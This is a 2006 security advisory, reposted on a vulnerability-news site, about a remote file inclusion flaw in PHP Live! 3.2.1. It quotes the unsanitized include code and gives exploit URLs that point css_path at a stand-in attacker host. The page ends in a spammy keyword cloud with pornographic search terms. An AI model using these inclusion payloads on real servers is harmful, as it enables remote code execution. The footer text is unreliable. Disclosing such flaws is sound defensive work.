about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability




2006-07-23 PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
Rated as : High Risk

    Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" :
$css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to
make
sure the code and your PHPLIVE you have to sanitize the variable
$css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------
aneurysm.inc security reserach
irc.gigachat.net
#aneurysm.inc
---------------------------
securitydot.net - 2006-07-23

Advertising

Copyright 2007, SecurityDot
Sat, 28 Nov 2009 22:18:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
tomcat& joomla+rem under take vip.qsnook CMS is Fre c exploits Www.Indian Mobilesexv mambo Remo how to ins free porn debian 4 Crack Data lo630l sexy moive Www.Indian Www+Galeri Midnightho www.google gaysex pic www.tamils Sage 1.0b3 3pi 8thstreetl sexy hot v www.freese /search/ex Crack Data MS04-028 sexprono hot sex xx sexcome any all mu news for C php-nuke 2 Darwin Www.sexmov Photo of k PHPRaider. mambo Remo www.hospit himachi ccms ARAB BIG T CAN-2002-0 Dambut.com www.liu-de PHPRaider. phpBB 2.0. www.3p&